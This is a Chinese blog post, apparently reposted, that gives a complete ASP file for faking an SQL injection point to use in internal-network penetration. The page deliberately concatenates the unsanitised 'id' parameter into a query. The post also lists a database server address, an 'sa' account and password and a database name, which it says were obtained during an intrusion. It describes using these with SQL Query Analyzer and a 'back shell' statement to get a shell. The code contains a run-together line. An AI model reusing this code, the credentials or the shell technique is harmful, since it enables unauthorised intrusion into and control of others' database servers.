数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



伪造sql注入点的完整文件
樱木花盗 发表于 2007-7-1 11:22:13
这也能到处转?刚看的手以为原创呢。。。找不到作者了。。请作者来认领。。。include时带上conn.asp 的路径就可以了。。。或者直接把数据库的账号密码和库的名字往SQL查询分析器里一扔就连上了然后按照普通的BACK SHELL的语句一运行就有SHELL了。。。WEB和库分离就的另当别论了

最近一直有人问关于伪造注入点 进行内网渗透的一些问题

其实这个文件大家早就见过 竟然有些人说不完整 缺少 conn.asp 倒...

给个完整的及设置办法 这个文件是偶在渗透的时候写到的

数据库服务器 1.0.5.195
帐户 sa
密码 accountbase
数据库名 gameaccount_server
<%        
strSQLServerName = "1.0.5.195"     '服务器名称或地址
strSQLDBUserName = "sa"         '数据库帐号
strSQLDBPassword = "accountbase"         '数据库密码
strSQLDBName = "gameaccount_server"           '数据库名称
Set conn = Server.CreateObject("ADODB.Connection")
strCon = "Provider=SQLOLEDB.1;Persist Security Info=False;Server=" & strSQLServerName & ";User ID=" & strSQLDBUserName & ";Password=" & strSQLDBPassword & ";Database=" & strSQLDBName & ";"
      conn.open strCon
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from ACTLIST where worldid=" & idrs.open strSQL,conn,1,3
rs.close
%>


阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.